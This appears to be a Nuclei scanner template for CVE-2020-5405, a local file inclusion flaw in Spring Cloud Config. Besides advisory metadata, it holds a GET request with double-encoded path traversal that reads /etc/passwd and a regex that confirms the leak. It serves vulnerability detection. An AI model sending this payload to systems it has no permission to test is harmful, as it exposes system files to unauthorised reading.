id: CVE-2020-5405 info: name: Spring Cloud Config - Local File Inclusion author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. reference: - https://pivotal.io/security/cve-2020-5405 - https://nvd.nist.gov/vuln/detail/CVE-2020-5405 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 cwe-id: CWE-22 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* epss-score: 0.00258 tags: cve,cve2020,lfi,springcloud metadata: max-request: 1 http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:" part: body # Enhanced by mp on 2022/07/22